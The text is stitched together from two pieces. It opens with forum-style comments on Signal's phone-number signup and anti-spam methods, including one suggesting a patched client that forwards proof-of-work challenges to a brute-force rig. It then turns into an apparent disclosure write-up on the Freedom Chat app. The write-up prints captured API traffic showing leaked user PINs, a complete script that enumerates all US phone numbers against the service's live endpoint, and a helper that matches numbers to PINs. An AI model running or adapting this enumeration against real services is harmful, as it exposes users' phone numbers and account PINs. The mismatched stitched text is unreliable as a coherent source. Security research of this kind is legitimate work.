The accounts are not generated in five minutes each by some random sweatshop worker: https://www.youtube.com/watch?v=CHU4kWQY3E8 shows tap actions synced across sixty devices, and that's just to deal with human-facing captchas that need to show human-like randomness. Proof-of-work is not a captcha, so you can automate it entirely. Signal's client is open source for a myriad of reasons, the most pressing of which is verifiable cryptographic implementations. So you can just patch your copy of the source to dump the challenge and forward it to the brute-force rig.
Either the enumeration itself has to be computationally infeasible, or it has to be seriously cost limited (one registration per 5 dollar prepaid SIM or whatever).
>Invite codes worked fine for Gmail
Yeah and back in ~2004 when Hotmail had 2MB of free storage, GMail's 1,000MB of free storage may have also "helped".
Waze was also invite-only, G+ was initially invite only. Did that model help or hurt them?
I'm not saying you're wrong, but I have no idea what you're getting at, because the sentence sounds kind of absurd. As a result, I'm not sure if it addresses your point, but just to throw it out there: Bitcoin and anti-spam are different applications of proof of work. Anti-spam has to strike a compromise between being cheap for the user (who is often on relatively low-powered mobile hardware), and yet annoying enough to deter the spammer. It's not unreasonable to believe that such a compromise does not exist.
> Bots may be better than humans at Captchas now, although I'm not certain of that, but they certainly weren't when Signal was designed.
Fair point, but again, even in 2014, an instant messenger with captchas would have much more friction than every other messenger. And captchas aren't just bad because they introduce enough friction to drive away pretty much everybody: they also make users feel like they're being treated as potential criminals.
> I don't see why invite codes would be a problem for mainstream use.
Can you elaborate? Invite codes blocking access to the service itself "like lobste.rs" mean that no one can use your service unless they've been transitively blessed by you. That's obviously going to limit its reach...
Different system. The parent and GP are talking about proof-of-work being used directly for account creation. If a chat service required mining-levels of PoW (and hence any prospective new users to have an ASIC), it would not be very popular. Nor would it be very popular if it used a relative difficulty system and the spammers used dedicated servers while the legitimate users had to compete using only their phones.
As long as IP leaks are possible, I'd rather also use Signal, where at least the rest is battle tested and state of the art.
My concern with Signal is they'll either comply or move out of the EU with the incoming Chat Control, and I'd rather have a fully decentralized messenger with as few leaks as possible.
> Not a very good case made since you obviously didn’t read the parent discussion.
This isn't an argument, do you have anything to back up your assertion?
> Yeah, no.
Nobody reads past this part. It reflects a lack of judgment, and also who wants to talk to someone in this context?
I don't think a Captcha for signup would have been much friction. Certainly less than providing a phone number.
Why would someone want to use a closed messaging service like Signal unless they knew an existing user? I don't think that the requirement for that existing user to invite them would be a significant barrier. So I think it's not going to limit its reach.
G+ didn't have that problem so much, but I don't remember it using invite codes.
But that would still put the CPM of the spam around US$2, which very few spammers can afford. Maybe mesothelioma lawyers and spearphishers.
You don't have to make spamming physically impossible, just unprofitable.
Notice that if you go this route you get no additional safety, and actually introduced an extra hazard.. don't lean in or your goggles get caught in the machine and drag your neck closer to whirling blades! Sorry if it's rude, but there's no nice way to say that this is bad to do and even worse to advocate for. If you don't get it, ok, go be as unsafe as you want when it's your ass on the line. No need to take the next step towards also trying to kill safety culture.
And broadcasting on FM radio is then what?
You’re just redefining words; there’s no need for this. We agree it would be better from a privacy point of view if Signal did not require a phone number, but you’re nitpicking: it’s a one-time thing, and you can use a phone number that no one can associate with you for this, and then never need it again if you have proper backups.
In the case of Twitter, there is evidence that the initial implementation was meant to just be a security mechanism but later someone else noticed they had a handy database of user phone numbers and decided to treat them as free marketing contact information.
If you're saying that the account creation flow through the system accounts application doesn't require a phone number, how are you sure that Google doesn't just collect the phone number directly from your device (they could even silently verify it through a class-0 silent SMS)?
Does it also not ask for a phone number if you factory reset, remove the SIM card, and do not register the phone with a Google account? Maybe they track the IMEI instead?
Neither of us had prior experience developing mobile apps, but we thought, “Hey, we’re both smart. This shouldn’t be too difficult.”
Once upon a time, in the distant memory that is 2023, a new instant messaging app called Converso was launched. Converso made some pretty impressive claims about its security: it claimed to implement state of the art end-to-end encryption, to collect no metadata, and to use a decentralized architecture that involved no servers at all. Unfortunately, security researcher crnković did some basic reverse engineering and traffic analysis and found all of these claims to be completely baseless, with Converso collecting plenty of metadata on every message and using a third-party E2EE provider to store messages on bog standard centralized servers. Even more unfortunately, crnković also found that Converso implemented the (perfectly functional if used properly) Seald E2EE service in such a way that encrypted messages’ keys could be derived from publicly available information, and also uploaded a copy of every encrypted message to an open Firebase bucket, meaning every message ever sent on the service could be trivially read by anyone with an Internet connection. After being informed of the vulnerabilities, Converso initially released an update claiming to fix them, then withdrew from the App Store and Google Play to “address and improve the issues.”
Not one to give up after a setback, Converso CEO Tanner Haas took a break from self-publishing books on how to achieve and receive anything you want to regroup and relaunch, as well as to bless the world with a lessons learned blog post describing his decision to rebrand after realizing that “privacy concerns were primarily coming from conservative circles,” and imparting nuggets of wisdom such as “accept criticism and get better: don’t complain” and “ensure the product has been thoroughly tested and is ready for prime-time.” Presumably he hadn’t learned the first one yet when he responded to crnković’s responsible disclosure with vague legal threats and accusations of being a Signal shill. Let’s see how the second is going.
As usual, I start out by downloading the app from Google Play and running it while monitoring traffic with HTTP Toolkit. I quickly run into Freedom Chat’s first security feature: as detailed on their website, the app “prevent[s] screenshots and screen recordings entirely with built-in screenshot protection,” perhaps to accommodate conservatives’ complicated relationship with screenshots. Screenshots aren’t really crucial to anything being discussed here, but I like to provide only the best blog posts to my tens of readers, so let’s hook the app with Frida and disable the FLAG_SECURE attribute. With that out of the way, the signup process works as expected for an instant messaging app - we type in a phone number, get texted a 2FA code, and enter it to create an account. We’re asked whether we want to create a PIN, which is apparently optional to log in on our own phone and required if we want to restore our account on another device, then get to the main UI of the app. There are two main features here: a Chat pane where we can start chats with contacts, and a Channels pane where we can subscribe to user-run microblogging channels à la Telegram.

Let’s start out with the basics and have a conversation with a second account. Sending a text message triggers the following exchange:
/message request
METHOD: POST
URL: https://eagle.freedomchat.com/message
User-Agent: okhttp/4.12.0
Accept: application/json, text/plain, */*
Accept-Encoding: gzip
Content-Type: application/json
Authorization: Bearer <JWT that was generated for us at login>
Connection: keep-alive
{
  "sendId": "bdbf9ef7-aaca-4a57-8c4e-5fe978205299",
  "type": "text",
  "files": [],
  "isEncrypted": true,
  "createdAt": "2025-11-20T21:12:09.180Z",
  "chatId": "64b9a972-4232-4026-a037-8848909b264d",
  "content": "{\"sessionId\":\"5900c62e-8819-43d7-a6fe-a1745c425bf3\",\"data\":\"5wNaCjU3Y0XOvwA9eCuejjJrxRGFNhr+dlnkmeWQcqpxPyfeueVlfVUihifjG33q5HrMMT4ex85c9W4iZcNziXPvVtrs1VrEW2ZWonccOdmXB91ONgLuG0fRjGoc3IFN\"}"
}
STATUS: 201 CREATED
{
  "message": {
    "id": "f1e3a08a-fc8f-4268-b6a8-36ab6abc0464",
    "content": "{\"sessionId\":\"5900c62e-8819-43d7-a6fe-a1745c425bf3\",\"data\":\"5wNaCjU3Y0XOvwA9eCuejjJrxRGFNhr+dlnkmeWQcqpxPyfeueVlfVUihifjG33q5HrMMT4ex85c9W4iZcNziXPvVtrs1VrEW2ZWonccOdmXB91ONgLuG0fRjGoc3IFN\"}",
    "user": {
      "uid": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
      "userName": null,
      "phoneNumber": "+13322699625",
      "isBlocked": false,
      "sealdKey": "180cc149-5bc6-406b-b32e-4afaadff2f47",
      "keyChangedAt": "2025-11-20T21:06:31.308Z",
      "createdAt": "2025-11-20T21:06:07.041Z",
      "updatedAt": "2025-11-20T21:06:31.311Z"
    },
    "role": "user",
    "type": "text",
    "sendId": "bdbf9ef7-aaca-4a57-8c4e-5fe978205299",
    "chatId": "64b9a972-4232-4026-a037-8848909b264d",
    "channelId": null,
    "erased": false,
    "isEdited": false,
    "isEncrypted": true,
    "parent": null,
    "selfDestructInSec": null,
    "destructAt": null,
    "createdAt": "2025-11-20T21:12:09.180Z",
    "updatedAt": "2025-11-20T21:12:12.638Z",
    "updateAction": "insert",
    "updateItem": "message",
    "updateValue": null,
    "updateUserId": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
    "statuses": [
      {
        "id": "4a1217f4-ab16-4f63-964d-4afd5cdd6b86",
        "recipient": {
          "uid": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
          "userName": null,
          "phoneNumber": "+13322699625",
          "isBlocked": false,
          "sealdKey": "180cc149-5bc6-406b-b32e-4afaadff2f47",
          "keyChangedAt": "2025-11-20T21:06:31.308Z",
          "createdAt": "2025-11-20T21:06:07.041Z",
          "updatedAt": "2025-11-20T21:06:31.311Z"
        },
        "recipientId": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
        "delivered": false,
        "deliveredAt": null,
        "read": false,
        "readAt": null
      },
      {
        "id": "3e6a8549-c2f7-41ca-8acc-3baa7fc51457",
        "recipient": {
          "uid": "5414cf2c-3f03-46b2-aa16-9e322359cafb",
          "userName": null,
          "phoneNumber": "+13095416781",
          "isBlocked": false,
          "sealdKey": "c1d370b9-2323-456d-b4ce-eac3e30014e2",
          "keyChangedAt": "2025-11-20T19:59:10.095Z",
          "createdAt": "2025-11-20T19:58:00.462Z",
          "updatedAt": "2025-11-20T20:59:02.686Z"
        },
        "recipientId": "5414cf2c-3f03-46b2-aa16-9e322359cafb",
        "delivered": true,
        "deliveredAt": null,
        "read": false,
        "readAt": null
      }
    ]
  },
  "assets": []
}
This is the encrypted and Base64-encoded text we sent, along with some metadata for things like read receipts and editing and the identifiers needed for decryption (they’re using the same Seald backend that Converso had, without uploading everything to Firebase this time). Sending a photo and a voice message yields similar results. While verifying that they’re using Seald properly this time would require painstakingly decompiling and reverse engineering React Native’s Hermes VM bytecode, at a high level this seems fine. Let’s move on to the Channels feature. When we open the tab, we see that we’ve already been added to a Freedom Chat channel, which mostly posts about updates to the app and related media coverage.

We’re also suggested a handful of other channels to join, including that of Tanner Haas and some people who are apparently conservative influencers. Tanner mostly seems to use his to post fascinating political takes:

When we open a channel, the following request and massive response happen:
/channel request
METHOD: POST
URL: https://eagle.freedomchat.com/channel?take=1000&skip=0&timestamp=1764377818411
User-Agent: okhttp/4.12.0
Accept: application/json, text/plain, */*
Accept-Encoding: gzip
Content-Type: application/json
Authorization: Bearer <JWT that was generated for me at login>
Connection: keep-alive
STATUS: 200 OK
{
  "data": [
    {
      "id": "b0fcab24-36ed-4dae-8f6b-07c5d96606ae",
      "name": "Freedom Chat",
      "verified": true,
      "recommended": true,
      "forTest": false,
      "description": "The official channel of Freedom Chat Inc. 🦅🇺🇸",
      "isScreenshotProtected": true,
      "isMediaSaveDisabled": false,
      "messageSelfDestruct": null,
      "createdAt": "2025-06-06T22:33:58.609Z",
      "updatedAt": "2025-11-11T15:05:56.565Z",
      "coverImage": {
        "id": "3c52569b-d9ba-4695-9469-c39c0bd6a95b",
        "key": "AC2E2C9C-B23D-4EEC-8F35-39ED2E3D002C-47bce191-d213-4c9f-8c09-c8095935632d.png",
        "mimeType": "image/png",
        "url": "https://fc-media.object.us-east-1.rumble.cloud/AC2E2C9C-B23D-4EEC-8F35-39ED2E3D002C-47bce191-d213-4c9f-8c09-c8095935632d.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=5rT0Vph76SOrvs39XKPfHBrwaFFZ2daB%2F20251128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20251128T161557Z&X-Amz-Expires=86400&X-Amz-Signature=3f976f4cf09177c28f1060203e3ac6bcdf87932badc5c601cb39b428a1e96a9d&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject",
        "createdAt": "2025-06-06T22:33:58.605Z",
        "updatedAt": "2025-11-28T16:15:57.150Z"
      },
      "creator": {
        "uid": "fce31a02-17b6-4298-9be4-<redacted for publication>",
        "userName": "freedomchat",
        "pin": "<six digit code redacted for publication>",
        "pinBackoffDate": "2025-11-07T23:37:09.265Z",
        "pinBackoffNb": 0,
        "isBlocked": false,
        "sealdKey": "956acbdf-925f-47b6-8323-<redacted for publication>",
        "keyChangedAt": "2025-09-21T14:48:08.778Z",
        "createdAt": "2025-06-06T15:28:50.364Z",
        "updatedAt": "2025-11-20T17:52:16.117Z"
      },
      "members": [
        {
          "channelId": "b0fcab24-36ed-4dae-8f6b-07c5d96606ae",
          "userUid": "9646aae0-956b-4252-993e-<redacted for publication>",
          "isMuted": false,
          "isScreenshotProtected": true,
          "isMediaSaveDisabled": false,
          "isDeleted": false,
          "isAdmin": false,
          "createdAt": "2025-08-22T20:19:43.835Z",
          "updatedAt": "2025-08-22T20:19:43.835Z",
          "user": {
            "uid": "9646aae0-956b-4252-993e-<redacted for publication>",
            "userName": null,
            "pin": "<six digit code redacted for publication>",
            "pinBackoffDate": null,
            "pinBackoffNb": 0,
            "isBlocked": false,
            "sealdKey": "e2ce450b-9701-4750-ad95-<redacted for publication>",
            "keyChangedAt": "2025-10-13T17:54:16.222Z",
            "createdAt": "2025-06-07T13:32:09.371Z",
            "updatedAt": "2025-10-13T17:54:37.187Z"
          }
        },
        {
          "channelId": "b0fcab24-36ed-4dae-8f6b-07c5d96606ae",
          "userUid": "8e4291dd-be77-43df-8227-<redacted for publication>",
          "isMuted": false,
          "isScreenshotProtected": true,
          "isMediaSaveDisabled": false,
          "isDeleted": false,
          "isAdmin": false,
          "createdAt": "2025-09-24T05:51:43.793Z",
          "updatedAt": "2025-09-24T05:51:43.793Z",
          "user": {
            "uid": "8e4291dd-be77-43df-8227-<redacted for publication>",
            "userName": null,
            "pin": "<six digit code redacted for publication>",
            "pinBackoffDate": null,
            "pinBackoffNb": 0,
            "isBlocked": false,
            "sealdKey": "eecd08da-e119-49e5-9f88-<redacted for publication>",
            "keyChangedAt": "2025-09-24T05:50:02.186Z",
            "createdAt": "2025-09-24T05:49:14.769Z",
            "updatedAt": "2025-09-24T05:50:02.185Z"
          }
        },
        ...
      ]
    }
  ]
}
The members array has 1519 entries in that format, apparently one for each member of the channel. What’s going on in that user object? The pin field seems suspiciously related to the PIN we were asked to input after creating our account… To confirm, we can sort the array by createdAt and find that the most recent entry does indeed have the PIN we just set when making our account. So anyone who’s in a channel (i.e. anyone who hasn’t left the default Freedom Chat channel) has their PIN broadcast to every other user! There’s no direct link between PINs and phone numbers here, but this is still not great.
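That confirmation step can be sketched as a tiny helper. The field names come from the response above; the input is a parsed copy of the /channel JSON, so this is illustrative rather than a tool for the live service:

```python
def newest_member_pin(channel_response: dict) -> str:
    """Return the PIN of the most recently created member account in the
    first channel of a parsed /channel response. ISO-8601 timestamps sort
    correctly as plain strings, so no date parsing is needed."""
    channel = channel_response["data"][0]
    members = sorted(channel["members"], key=lambda m: m["user"]["createdAt"])
    return members[-1]["user"]["pin"]
```

If the returned PIN matches the one we just chose at signup, the `pin` field is exactly what it looks like.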
If we scroll back a bit in the Freedom Chat channel, we see this message dunking on WhatsApp:

The vulnerability they’re talking about was presented in a paper by researchers at the University of Vienna. The paper is interesting and you should go read it, but to summarize, WhatsApp failed to rate limit the API that eats up every phone number in your contacts and checks whether they also use WhatsApp or not. Researchers were thus able to test nearly every possible phone number in the world, and end up with a dump of every WhatsApp user’s phone number, along with some other metadata. It’s interesting that Freedom Chat isn’t vulnerable to this, because they have the same contact discovery feature WhatsApp does, with the app offering you to either start a chat or invite each of your contacts depending on whether they already have an account:

Let’s find out for ourselves. When we open this contacts page, the following request-response happens:
/user/numbers request
METHOD: POST
URL: https://eagle.freedomchat.com/user/numbers
User-Agent: okhttp/4.12.0
Accept: application/json, text/plain, */*
Accept-Encoding: gzip
Content-Type: application/json
Authorization: Bearer <JWT that was generated for me at login>
Connection: keep-alive
{
  "numbers": [
    "+13322699625",
    "+13095416781",
    "+16042771111"
  ]
}
STATUS: 201 CREATED
[
  {
    "uid": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
    "phoneNumber": "+13322699625",
    "sealdKey": "1eea159c-620f-4561-95e8-2918e7d891fc"
  },
  {
    "uid": "5414cf2c-3f03-46b2-aa16-9e322359cafb",
    "phoneNumber": "+13095416781",
    "sealdKey": "c1d370b9-2323-456d-b4ce-eac3e30014e2"
  }
]
The first two numbers in the request are the two we used to register Freedom Chat accounts. The third is a number we didn’t register, as a control. A couple of things are interesting here. Most obviously, this is exactly the WhatsApp API the Vienna researchers exploited, and it will contain the same vulnerability if not rate limited. This endpoint also provides a linkage between phone numbers and UIDs - if we could run every registered phone number through it, we could get each number’s UID and match it to the UIDs in the Channels response to get that number’s PIN, entirely defeating the PIN mechanism. Now we just need to test whether it’s rate limited.
Freedom Chat enumeration script
import itertools
import datetime
import random

import pandas as pd
import requests

area_codes = [
    201, 202, 203, 205, 206, 207, 208, 209, 210, 212, 213, 214, 215, 216, 217, 218, 219, 224, 225, 228, 229, 231, 234, 239, 240, 242, 248, 251, 252, 253, 254, 256, 260, 262, 267, 269, 270, 276, 281, 283, 301, 302, 303, 304, 305, 307, 308, 309, 310, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 323, 325, 327, 330, 331, 334, 336, 337, 339, 340, 346, 347, 351, 352, 360, 361, 386, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 412, 413, 414, 415, 417, 418, 419, 423, 424, 425, 430, 432, 434, 435, 440, 443, 458, 469, 470, 475, 478, 479, 480, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 512, 513, 514, 515, 516, 517, 518, 520, 530, 540, 541, 551, 559, 561, 562, 563, 564, 567, 570, 571, 573, 574, 575, 580, 585, 586, 601, 602, 603, 605, 606, 607, 608, 609, 610, 612, 614, 615, 616, 617, 618, 619, 620, 630, 631, 636, 641, 646, 650, 651, 657, 660, 661, 662, 667, 669, 678, 681, 682, 701, 702, 703, 704, 705, 706, 707, 708, 712, 713, 714, 715, 716, 717, 718, 719, 720, 724, 727, 731, 732, 734, 740, 747, 754, 757, 760, 762, 763, 765, 770, 772, 773, 774, 775, 781, 784, 785, 786, 787, 801, 802, 803, 804, 805, 806, 808, 810, 812, 813, 814, 815, 816, 817, 818, 828, 830, 831, 832, 843, 845, 847, 848, 850, 856, 857, 858, 859, 860, 862, 863, 864, 865, 870, 872, 873, 876, 877, 878, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 912, 913, 914, 915, 916, 917, 918, 919, 920, 925, 928, 931, 937, 940, 941, 947, 951, 952, 954, 956, 970, 971, 972, 973, 975, 978, 979, 980, 985, 989
]

digits = ("0", "1", "2", "3", "4", "5", "6", "7", "8", "9")
# Every 7-digit suffix; NANP exchange codes can't start with 0 or 1, leaving 8M per area code.
orig_combinations = pd.Series(["".join(x) for x in itertools.product(digits, repeat=7)])
orig_combinations = orig_combinations[~orig_combinations.str.startswith("0") & ~orig_combinations.str.startswith("1")]

url = "https://eagle.freedomchat.com/user/numbers"
authToken = "initial auth token"
refreshToken = "initial refresh token"

with open("freedom_enum_log.txt", "w") as logfile:
    random.shuffle(area_codes)
    for ac in area_codes:
        logfile.write(f"Starting area code {ac}\n")
        combinations = ["+1" + str(ac) + c for c in orig_combinations]
        for i in range(0, 8000000, 40000):
            tranche = combinations[i:i + 40000]
            tranche.append("+13322699625")  # control: a number we registered, to detect false empty responses
            payload = {"numbers": tranche}
            headers = {
                "accept": "application/json, text/plain, */*",
                "authorization": f"Bearer {authToken}",
                "content-type": "application/json",
                "host": "eagle.freedomchat.com",
                "connection": "Keep-Alive",
                "accept-encoding": "gzip",
                "user-agent": "okhttp/4.12.0"
            }
            response = requests.post(url, json=payload, headers=headers)
            if "Unauthorized" in response.text:
                # Access token expired: refresh it and retry with the new token.
                refreshResponse = requests.post("https://eagle.freedomchat.com/auth/refresh", json={"refreshToken": refreshToken})
                authToken = refreshResponse.json()["accessToken"]
                refreshToken = refreshResponse.json()["refreshToken"]
                headers["authorization"] = f"Bearer {authToken}"
                response = requests.post(url, json=payload, headers=headers)
            if response.text.count("uid") != 1:
                logfile.write(response.text + "\n")
            if response.elapsed > datetime.timedelta(seconds=3):
                logfile.write(f"Getting slow! {response.elapsed}\n")
            logfile.flush()
        logfile.write(f"Done area code {ac}\n")
This is pretty self-explanatory. We generate every valid 7-digit North American phone number, then for every area code, send every number in batches of 40,000, plus a number we registered so we can check for false empty responses. We log responses that don’t contain the string “uid” exactly once: if a response contains it 0 times it has failed to return our registered number and is thus faulty somehow, and if it contains it 2+ times we have found another number. We also reauthenticate as needed and note if we start to slow down the server at all. Yes, there are a million ways to make this concurrent and faster, but we’re trying to enumerate, not DDoS, their server, and at ~1.5 seconds average RTT we should be able to test every American phone number in about a day.
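As a sanity check on that timing estimate, here's the back-of-the-envelope arithmetic (illustrative numbers; ~300 area codes roughly matches the list above):

```python
# Rough runtime estimate for the enumeration script.
area_code_count = 300               # roughly the size of the NANP list above
numbers_per_area_code = 8_000_000   # 7-digit suffixes not starting with 0 or 1
batch_size = 40_000
avg_rtt_seconds = 1.5

total_requests = area_code_count * (numbers_per_area_code // batch_size)
total_hours = total_requests * avg_rtt_seconds / 3600
print(f"{total_requests} requests, ~{total_hours:.0f} hours")  # 60000 requests, ~25 hours
```

Twenty-five-ish hours of sequential requests lines up with the observed run time.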
The log file starts to fill up with entries within a few minutes:
Starting area code 305
[{"uid":"08171874-4b15-47d8-aa78-<redacted for publication>","phoneNumber":"+13052<redacted for publication>","sealdKey":"941bb3f1-a7e1-4565-a302-<redacted for publication>"},{"uid":"0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6","phoneNumber":"+13322699625","sealdKey":"c0b5fb1c-c1ea-4177-872d-159ff524328b"}]
[{"uid":"abde2596-80df-4e87-993d-<redacted for publication>","phoneNumber":"+13053<redacted for publication>","sealdKey":"643c55e4-badd-4932-9051-<redacted for publication>"},{"uid":"0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6","phoneNumber":"+13322699625","sealdKey":"c0b5fb1c-c1ea-4177-872d-159ff524328b"}]
[{"uid":"64ef67ef-d4b2-4545-9592-<redacted for publication>","phoneNumber":"+13054<redacted for publication>","sealdKey":"38d04de8-752f-4214-b8be-<redacted for publication>"},{"uid":"0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6","phoneNumber":"+13322699625","sealdKey":"c0b5fb1c-c1ea-4177-872d-159ff524328b"}]
[{"uid":"b0366897-bfeb-474d-9c15-<redacted for publication>","phoneNumber":"+13057<redacted for publication>","sealdKey":"06dfc59c-2318-4419-93d1-<redacted for publication>"},{"uid":"0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6","phoneNumber":"+13322699625","sealdKey":"c0b5fb1c-c1ea-4177-872d-159ff524328b"}]
Time to go do something else for a while. Just over 27 hours and one ill-fated attempt at early season ski touring later, the script has finished happily, the logfile is full of entries, and no request has failed or taken longer than 3 seconds. So much for rate limiting. We’ve leaked every Freedom Chat user’s phone number, and unless they happened to leave the default channel, we’ve also matched their phone number to their PIN, rendering the entire PIN feature pointless.
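The final matching step - joining the enumerated numbers against the channel member dump - can be sketched like this. It's a minimal helper assuming parsed copies of the /user/numbers hits and the /channel members array, with field names taken from the captures above:

```python
def phones_to_pins(number_hits: list, channel_members: list) -> dict:
    """Map phone numbers to PINs by joining /user/numbers results
    (uid + phoneNumber) against the /channel member list (uid + pin)."""
    pin_by_uid = {m["user"]["uid"]: m["user"]["pin"] for m in channel_members}
    return {
        hit["phoneNumber"]: pin_by_uid[hit["uid"]]
        for hit in number_hits
        if hit["uid"] in pin_by_uid
    }
```

Anyone still in the default channel shows up in `channel_members`, so their enumerated phone number maps straight to their PIN.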